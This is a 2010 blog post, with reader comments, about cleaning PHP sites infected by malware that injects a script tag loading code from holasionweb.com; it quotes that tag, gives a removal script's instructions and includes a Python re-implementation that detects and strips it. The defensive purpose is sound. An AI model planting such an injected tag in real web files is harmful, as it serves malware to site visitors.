Daniel Ansari’s blog Random software musings

May 12, 2010

holasionweb.com

Filed under: Malware — admin @ 2:44 pm

One of my Joomla sites on shared GoDaddy hosting got re-infected this morning with this malware, which runs this script from every php file that it infects:

<script src="http://holasionweb.com/oo.php"></script>

Interestingly, none of my other GoDaddy sites have got infected yet (and this blog is running an older version of WordPress), including one other Joomla site on the same server.

I modified my Gumblar removal script and added a regular expression to remove this malware.  It can be downloaded here.

Unlike the script at Securi.net (at the time of writing), this script does not leave a blank line at the top of your files, thus, you won’t get any errors from your web applications – it leaves your files in exactly the same state as before the infection.  It also saves your original infected file with a .bak extension, just in case you need to keep the originals for some reason.  These can be deleted later, and will not affect your site.

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/scan_files.php
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.

Notes:

  • The script skips files greater than approx 1 MB in size.
  • If the path to the file ends with /images/image.php or /images/gifimg.php, the script deletes it in update mode.  That’s because this was one of the signatures of the Gumblar malware.

Update (Aug 19, 2010): I added another script, delete_infected_backups.php, to scan_files.zip.  In order to delete the .bak files:

  1. Place the file delete_infected_backups.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/delete_infected_backups.php
  3. Use delete_infected_backups.php?u=1 to run it in update mode, where the .bak files will actually be deleted.
  4. The script deletes all files with names ending in:
    • .html.bak
    • .htm.bak
    • .shtml.bak
    • .js.bak
    • .php.bak
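The following is an added example, not the author's scan_files.php or delete_infected_backups.php: a stand-alone Python re-implementation of the behaviour the two instruction lists describe (report vs. update mode, the ~1 MB size limit, deletion of the Gumblar dropper paths, a .bak copy of each infected original, and the second script's .bak cleanup). Function names, the set of scanned extensions and the curly-quote tolerance in the pattern are my assumptions.

```python
import os
import re
import shutil

# The injected tag the post quotes; the src may be wrapped in straight or curly quotes.
INJECT_RE = re.compile(
    r'<script\s+src=["\'\u201c\u201d]?http://holasionweb\.com/oo\.php["\'\u201c\u201d]?\s*>'
    r'\s*</script>', re.IGNORECASE)
MAX_SIZE = 1024 * 1024                                          # files over ~1 MB are skipped
DROPPER_SUFFIXES = ("/images/image.php", "/images/gifimg.php")  # Gumblar dropper paths
SCAN_EXTS = (".html", ".htm", ".shtml", ".js", ".php")          # assumed set of file types
BACKUP_SUFFIXES = tuple(ext + ".bak" for ext in SCAN_EXTS)
IO_OPTS = dict(encoding="utf-8", errors="surrogateescape", newline="")  # byte-exact round trip


def clean_tree(root, update=False):
    """Report (update=False) or remove (update=True) the injected tag under root.
    Returns (infected_files, dropper_files); infected originals are kept as <file>.bak."""
    infected, droppers = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if path.replace(os.sep, "/").endswith(DROPPER_SUFFIXES):
                droppers.append(path)
                if update:
                    os.remove(path)
            elif name.endswith(SCAN_EXTS) and os.path.getsize(path) <= MAX_SIZE:
                with open(path, **IO_OPTS) as fh:
                    data = fh.read()
                fixed = INJECT_RE.sub("", data)   # drop only the tag, nothing else changes
                if fixed != data:
                    infected.append(path)
                    if update:
                        shutil.copy2(path, path + ".bak")   # keep the infected original
                        with open(path, "w", **IO_OPTS) as fh:
                            fh.write(fixed)
    return infected, droppers


def delete_backups(root, update=False):
    """List the .bak files clean_tree left behind; delete them when update=True."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(BACKUP_SUFFIXES):
                found.append(os.path.join(dirpath, name))
                if update:
                    os.remove(found[-1])
    return found
```

Run clean_tree(root) first to see what would change, then clean_tree(root, update=True); delete_backups follows the same report-then-update pattern once the cause of the infection is understood.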

51 Comments »

  1. thanks very much , you saved my site

    Comment by michael — May 12, 2010 @ 9:41 pm

  2. You are the best. We got hit on two GoDaddy sites starting May 8th. Great script.

    Comment by Lee Leslie — May 12, 2010 @ 10:10 pm

  3. please teach me how to remove .bak file
    thank you

    Comment by michael — May 12, 2010 @ 11:18 pm

  4. @michael: lol, I don’t have a script for that yet, but I could make one easily enough – I’m just going on a 4-day trip tomorrow evening, so I won’t be able to write it until I get back.

    I would leave the .bak files on the server anyway for now, until the cause of the infection has been determined, because until then, it’s very possible that you’ll get reinfected, run this script again, and have new .bak files created.

    Comment by admin — May 12, 2010 @ 11:34 pm

  5. Dude, You saved my butt with this script. I got hit hard with the virus/hack this morning and even though I restored my files from a previous date, I was still having issues with the holasionweb thing. I ran your PHP script and worked like a charm. Thanks again for putting this out there for us poor WordPress hackees.

    Jeff

    Comment by Jeff Revell — May 13, 2010 @ 12:04 am

  6. wow, you are my hero. thank you, thank you, thank you.

    Comment by se — May 13, 2010 @ 1:44 am

  7. Dude!!! are you serious? is it really that easy??? You Are Awesome!!! Thank You So Much… Get ready for your tool and blog become popular!!! 🙂 I ran your scan_files script on my GenuineAid.com and now the blog become faster and no more of holasionweb junk visible. I also changed my admin password as soon as I finished with your script. Thank you 🙂

    Comment by Vladimir — May 13, 2010 @ 9:18 am

  8. […] Click to read and download the fix if this virus script is embedded in your site. Link […]

    Pingback by Doohub blog » Blog Archive » malwere holasionweb.com — May 13, 2010 @ 10:05 am

  9. Daniel:
    Thank you for posting such a helpful post about this issue. If you wouldn’t mind, please contact me via email to discuss writing an article for my site to go over this problem, and your solution. I think you could help a lot of people.

    Thanks,
    Traci

    Comment by Traci Hayner Vanover — May 13, 2010 @ 10:06 am

  10. Dude, I even wrote about you and your help on my Blog 🙂

    Comment by Vladimir — May 13, 2010 @ 10:32 am

  11. @Vladimir: Thanks, mate. Don’t forget you need the ?u=1 at the end of the URL to fix the files.

    Comment by admin — May 13, 2010 @ 10:58 am

  12. Do you know how they got in? Old script? or a godaddy fault?

    Comment by Trevyn — May 13, 2010 @ 1:01 pm

  13. @Trevyn: That’s the 64 million dollar question. We’re still waiting for someone to come up with the exact method of infection. Until that happens, we’re not safe.

    Comment by admin — May 13, 2010 @ 1:13 pm

  14. Thanks dear for the script. You saved my life.
    Any tips from you so that same thing shouldn’t occur again.

    Comment by Praveen — May 13, 2010 @ 4:21 pm

  15. Sorry, I don’t know how to prevent it – at the moment nobody does. Just monitor your site at least twice per day until the method of prevention is found, and run this script if you get reinfected.

    Comment by admin — May 13, 2010 @ 4:24 pm

  16. Thanks….. it was a help to me!!!

    Comment by yaev — May 13, 2010 @ 11:09 pm

  17. Thanks so much for this! It worked great. I’d be very interested to know how to prevent this.

    Comment by Albert — May 14, 2010 @ 6:28 am

  18. Thanks! Your script saved me a lot of work and trouble. I noticed that in my home directory there was a script called gdform.php. I think that script causes the problem.

    Comment by Cancerinform — May 15, 2010 @ 6:06 pm

  19. Thanks… running this script as a CRON job on the hour

    Comment by Bourgy — May 15, 2010 @ 8:23 pm

  20. This script is a life saver, thank you so much.

    Comment by Craig — May 16, 2010 @ 3:00 am

  21. wow, thank you so much for this

    Comment by joey — May 17, 2010 @ 12:28 pm

  22. Thanks for the script Daniel. It’s a lifesaver. Have you heard anything about whether GoDaddy is taking responsibility for this, or if there’s a way to prevent it? Also, the script made bak files for all my directories except the root directory. It looks like the files in the root directory were cleaned, but there’s no bak files for them. Is this the way it’s supposed to be? Lastly, I’d like to put in my vote for a script to remove the bak files when they are no longer necessary. Thanks again!

    Comment by Doug — May 17, 2010 @ 1:13 pm

  23. Made another script (to detect and cure the eval(base64_decode) hack, that is a bit less overwhelming, published it in this post: http://bit.ly/c2yGCP

    Hope you don’t mind.

    Peter

    Comment by Peter — May 17, 2010 @ 1:38 pm

  24. VERY NICE SCRIPT KEEP UP THE GOOD WORK

    Comment by Mike — May 19, 2010 @ 1:18 am

  25. Thanks so much for sharing this script. It has helped me get back live after 1 week of RND.

    Comment by Amit Desai — May 20, 2010 @ 9:18 am

  26. […] Daniel Ansari’s blog […]

    Pingback by Fix for Wordpress sites and blogs hosted on Godaddy infected by holasionweb virus — May 20, 2010 @ 10:30 am

  27. Hi,

    thanks for sharing this tool! it saved my ass!!

    keep up the good work 🙂

    Supun

    Comment by Supun Perera — May 21, 2010 @ 9:59 am

  28. thank you!!

    now if only I can figure out what’s wrong with my dashboard’s css…

    Comment by Lillian — May 23, 2010 @ 12:44 am

  29. Thanks SO much. It took me about a week to find this post, but the script worked like a gem for me. thanks so much!

    Comment by Jeffrey — May 23, 2010 @ 4:55 pm

  30. Thank you very very very much!!!!! You saved my site. My site was infected about a week ago.

    Comment by PZ — May 25, 2010 @ 1:12 am

  31. Daniel. You are da man!

    I gave you a link in my blog and a thankyou. Your script cleaned my blog and my forum.

    YOU ROCK!!

    Comment by Jafar Calley — May 28, 2010 @ 4:03 pm

  32. Thank you very much for this removal script. It was easy to apply and worked great on SMF 1.1.11 (Simple Machines Forum).

    Comment by Carl — May 31, 2010 @ 10:12 am

  33. Hi Daniel…

    I have been wondering for weeks why my Admin Panel has been acting up? I thought it was a server issue, but didn’t go back to figure out what it was until today. So, I did a full site back up and upgrade only the problems seemed to be worse, I had Lost ALL Control over certain areas of my Admin. (I am using Interspire Webpublisher on this particular site. Well, then I decided to go back and restore the older version and that was when I kept getting redirected to this holasionweb.com script that really freaked me out. I found your site when I Googled the holasionweb.com word. Your scan_files.php script worked!!! Yeah! I have done a check of my hosting accounts with Go Daddy and hopefully this is the only error that I have… Could you answer me one thing… Is this file enough to scan every domain that I have hosted or do I need to do the scan on each individual domain?? You are truly a Gem! Thank You for your Great Help… Meg

    Comment by Meg — June 4, 2010 @ 10:05 am

  34. Thanks for the nice comments, Meg. It depends on how your sites are hosted. One of my sites on GoDaddy is hosted on a Premium account and has one main domain, and several other domains in subdirectories. If that site got infected, it would be enough to run the script once for the main site (domain), and the subdirectories (including the other domains) would also get cleaned.

    You may need to run it for each domain, however, if the directories for the domains are not in the same hierarchy or if the domains are hosted on different servers.

    Comment by admin — June 4, 2010 @ 10:13 am

  35. Worked like a charm. Thank you. I have several WP sites hosted inside directories on the root of the server and was thinking that maybe one of them got infected and this resulted in the main site getting flagged. Thanks.

    Comment by P — June 23, 2010 @ 10:51 pm

  36. I ran your script (been having lots of trouble with my wp site, spreading the infection to my photocart also hosted on the same server), and now I think things are screwy 🙁 I went to change my password and all I get is “Warning: Cannot modify header information – headers already sent by (output started at /home1/funfresh/public_html/wp-config.php:4) in /home1/funfresh/public_html/wp-includes/pluggable.php on line 890” trying to access my admin side– help? I am not website savvy at all, so any suggestions (for the technically challenged) would be greatly appreciated!

    Thanks!

    Comment by Amy — July 8, 2010 @ 11:45 am

  37. Hi Amy, could you put the contents of the file /home1/funfresh/public_html/wp-includes/pluggable.php up on http://pastie.org and give me the link? I could ask for wp-config.php too, but only if you make sure that you change any sensitive data there.

    Comment by admin — July 8, 2010 @ 1:43 pm

  38. pastie keeps timing out 🙁 Would you be willing to email me (amylantz03 at yahoo dot com) so I can send it to you in a text doc? Thanks 🙂

    Comment by Amy — July 8, 2010 @ 9:13 pm

  39. can i use this script on an ASP website?

    regards
    akhalifa

    Comment by akhalifa — July 21, 2010 @ 7:08 am

  40. I have a wordpress MU site and it’s infected but i don’t know if it is this malware. I used your script as described but it didn’t work for me. Any tip?

    Comment by john — August 4, 2010 @ 9:06 am

  41. akhalifa, I’m sorry, you can’t, as this is a PHP script, so it won’t work under ASP.

    Comment by admin — August 4, 2010 @ 9:14 am

  42. John, I looked at your site and didn’t see any malware signs in the source code of the home page, neither did my Avira detect anything. How do you think it’s infected?

    Comment by admin — August 4, 2010 @ 9:15 am

  43. I don’t have any clue. I’m using ixwebhosting.com for hosting and all of my wordpress sites are infected-hacked. I’m using avast antivirus and it stops firefox from opening my sites and the admin area from wordpress as well. I’m confused.

    Comment by john — August 4, 2010 @ 10:04 am

  44. I will add a temporary index.html file to the root of my websites that states my site is down for maintenance. There’s no reason to say my sites are infected and scare people that haven’t been infected.

    Comment by john — August 4, 2010 @ 10:07 am

  45. Does Avast tell you what the infection is? If not, you can try this: do “view source” on the page, then save it as a separate HTML file on your server. Next, hit that page in your browser to confirm that Avast still detects an infection there. From there, you can progressively cut out the HTML until Avast stops detecting something. You can hone in on the problem that way.

    Comment by admin — August 4, 2010 @ 10:20 am

  46. ok let me try this. I’ll keep you informed

    Comment by john — August 4, 2010 @ 10:56 am

  47. Avast still detects an infection there

    Comment by john — August 4, 2010 @ 10:57 am

  48. I am having a problem with this type of virus… Can you please help me out of here…
    See my web, and hopefully you will know my problems….

    Comment by tuikah — August 10, 2010 @ 3:24 am

  49. Wow! Thank you so much this really worked!! Super easy!!! Initially on Avast it detected an infection, but after running the removal script nothing came up.

    Comment by martin — August 12, 2010 @ 2:09 am

  50. I just added an update to this post, which explains how to remove the .bak files that were created as a result of the cleaning process. I just ran it on my production websites, so it’s been tested 🙂

    Comment by admin — August 19, 2010 @ 4:03 pm

  51. tuikah, if you go to your site in Firefox and click on the “Why was this page blocked” button, you can see at the bottom of that page, “Next steps… If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools.” If you do that, after Google has done their review, that warning should disappear.

    Comment by admin — August 19, 2010 @ 4:08 pm
